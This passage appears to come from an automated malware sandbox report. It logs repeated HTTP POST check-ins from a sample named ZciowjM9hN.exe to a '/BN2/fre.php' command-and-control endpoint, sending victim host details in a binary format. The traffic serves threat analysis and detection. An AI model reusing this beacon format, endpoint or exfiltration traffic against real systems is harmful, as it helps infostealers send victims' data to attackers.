Jun 9, 2022 12:19:22.945173979 CEST	1343	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g8gdVOnxoFG9EH0CTn5qQ0wQuVZYEvah%2FK5d9B7EvMrPjLrTDXZalEZjQGKhctS4MMXuUXBViTRixr6T8I%2FJfv6jz3HJjZSNSCdds8sZa2%2Ba01w6eSlLHE7T64FX6tllwhfM1sl5L5D1YpAW0ROQDJI4vd1sdt3p"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718920ea4a6b8fee-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49776	188.114.97.6	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:23.957128048 CEST	1344	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:23.974256992 CEST	1344	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:24.182347059 CEST	1345	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jZBRjkz8%2B2y3HpL2tgT4taFdqFwsESYascnMyGV%2FyP%2FgH8CC1sw8BW%2FHOpwBOJsSTzqWc6%2BcyfArEfHhL75cZveNqLKMwWuoQ3ZNXgjVLdesB2AOT5%2Bia%2BtBamzsScTXmNLKfHpa9%2FOJtifWkfV8yUz6kDSiO%2BdP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718920f2ba9c90ee-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49777	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:25.204895973 CEST	1346	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:25.222219944 CEST	1346	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:25.556766987 CEST	1347	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T2JXpxOLNmP1mymnSzOq8pUqokKz1iNozPcpcMWCu5eP4klO%2FHuWjTqYDuN1MVfss2uqnylMfbtRfZwHj%2BBJfsS%2BlyFzU3f9Ao%2FDLwz2AEMP3VE2CGY2tdziP4i9aOV8iWaF2dlp7ynn6nILBWEiGWF7DsOQwDAd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718920fa888b9168-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49778	188.114.97.6	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:26.733757973 CEST	1348	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:26.751442909 CEST	1348	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:26.890752077 CEST	1349	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WOuoQj9wVeDdG%2FMEiyudMbyDpybWcO%2Fq%2BPi8bsQO6zHwZbUwjcECW3HrvSoZNezqLeO76TKD9CbhdE%2FmrFyoFMq0kkQg41nLUcND6v6qHQcHOLiEEHQYWZo5%2BIM%2FrsXIRRpbSqFpAtph8QwYG8zxRGXtIHf1uUi3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718921041ad16958-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49751	188.114.97.6	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:18:53.097949982 CEST	1154	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:18:53.114986897 CEST	1155	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:18:53.248898029 CEST	1155	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:18:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rU%2Bw0mXhB6I5FW0byQjeXSc4DSuosUBq41ZQFUynCHd%2FIup9PgsoCzNaNxSLJa%2FJKtSyiYOClgAhUhWc0%2FMLXIFk8BFho1kUrDpNS20n%2FDEDKZCyUzqFlWxkzH2iEXuVWxJVvnxtrwa8fRowDvks1JxlvkDWjXl0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71892031ed199049-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.3	49779	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:28.006927013 CEST	1350	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:28.023961067 CEST	1350	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:28.178622007 CEST	1351	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GFUADe%2F2jSsWaJOoInaIPwbTbcbw0iJiS%2BfYtGCHzwHMdB8g4wucqx15mp4D8hPGEhHUZJ94YY%2BEsmQUDKe9PsDIAss9e%2BBfO9Lo21dPSKwW%2F10nf6u6OhV76ZeiljwZ11apn363FXDoo1iqP1r7t2RJ5cgMEx0t"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189210c0dc591f6-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.3	49782	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:30.781711102 CEST	1372	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:30.798774958 CEST	1372	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:30.919230938 CEST	1399	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s4sV7e6M5lllzYCK63pJb1PewwfnQ3vL2rl%2BGY1Frn7MliVIXjbDJYRO9XB54mNkKvOwUO90zJTVbGvEk3muV%2BxlGFDsJqrg8yw6r8yq411TTcymJm0jsXJxYFeqb0SnE1J51U2UoqBhws3BAML34dtXecTCROfi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189211d6ced9bb8-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.3	49783	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:36.273915052 CEST	1400	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:36.290921926 CEST	1400	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:36.381258965 CEST	1401	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eLZ%2BoIsb6vAsQId0wexvveJG2G4mmjT8To5s671CY9cBsCCAM3dj6e2%2FHAnasxU54HfD5%2FmUvYwrJH1WgbpNs%2FAtnEBCH8G6UsvzAT5FNtvIP9StDtGENIVxyidNsZowBHbt91eIrszGVFx3EPNeeg%2F74Rs7vlCP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189213fb87e90dc-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.3	49784	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:39.004620075 CEST	1402	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:39.021857977 CEST	1402	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:39.411545992 CEST	1403	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O0u7YBCUyETkybJoGufOz4jXPixi%2Bd41t2lMBsfy3LZ909xdl0uwHIm43ORVizviXi4cYvkpvHvvlKvDt6cGxZiuol0vfZw7J0TFEub9CcHK7R7Cyz2O7%2BWrjdQX9SjLV3UlprAy8sePdYdTEdwEmmTaCM5O0wyJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71892150c8f5927a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.3	49785	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:42.634597063 CEST	1404	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:42.651922941 CEST	1404	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:42.788748980 CEST	1405	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=86VyKv%2BjC6XcSJ8EpxqsE9VRoez7Qrk8y1frtoa5WLREenwOTJUcU6OJVAmDaFQW%2FAg42m8JaYHgExd8CS3UqZhr7ZZXyON8i7wI7DckxuASM9uh%2B89riG19mn%2F2yZ17USiR9bluZfG5ivsPntIhs1xjXjGf%2FCRM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718921677dd26934-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.3	49786	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:44.361043930 CEST	1405	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:44.378279924 CEST	1406	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:44.643172979 CEST	1407	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Uj0vF73gywbb8yc3scd9SbHupt4nJfYnhd9t4BFLzVi4goIVgz7VfaUDTsl8nKe0Z5%2FyxWrYh7%2FpcbNyOCAdhgo6NcAUuK2hcOGSjyinMCv0CqNICzsBLcuAKaZ6r0TyWIo6XaAlCrMbhWEmzk7wygftRLeBThkH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71892172491e9a2a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.3	49792	188.114.97.6	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:45.858683109 CEST	3942	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:45.876180887 CEST	3943	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:45.962203979 CEST	3945	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rvF0QbgH4XG55rvZvPHSALd3bCsTeqH5X%2B1jlif22jCSvNH3%2BL4cDWYAEYPCjc5lYfLhanoqeGfb1Lc1APMBoJ%2B3x28yhKgpshzpoF8oQS0p4wzD8tA1dPO%2FlJXfT7V%2BfBsNUzt0rj02F82Unez%2BMUCYNDVI6yHd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189217ba9ef9bf8-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.3	49793	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:50.509118080 CEST	8624	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:50.526200056 CEST	8624	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:50.626293898 CEST	8625	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NEYPjXzzKchXqNruNU1r%2BaUba%2FD5yH%2B33DaNFahi4dCOIhbM6o6qqcor18btDnRhY20LDPb7bIzvqJHsOSxJo3DX9f5dEy%2BHBrHNgvpx8HIvox0CK7NK0DWSKbZDfdPp9ZIyg2i4wr0V3IM95P62SlLx%2BlF4EQLZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71892198bcbb9142-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.3	49794	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:52.723949909 CEST	8626	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:52.741095066 CEST	8626	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:52.869291067 CEST	8627	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Rzvfo8d18tZ9q%2FbNsgkgtBAemFcQH4gNtMC4iQaz3IKbUwG19DqPlpBmQ6BxComqAFxToOF26om99TNNCGBsR%2B00xBQB63GcKPIIY931PQErZ4CLdHgcm%2BH6TBjMxjWvgbriuClNpQzH3hoL8XxRlYlfwVNXVC6y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718921a68caf904f-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.3	49796	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:54.857506037 CEST	9109	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:54.875508070 CEST	9109	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
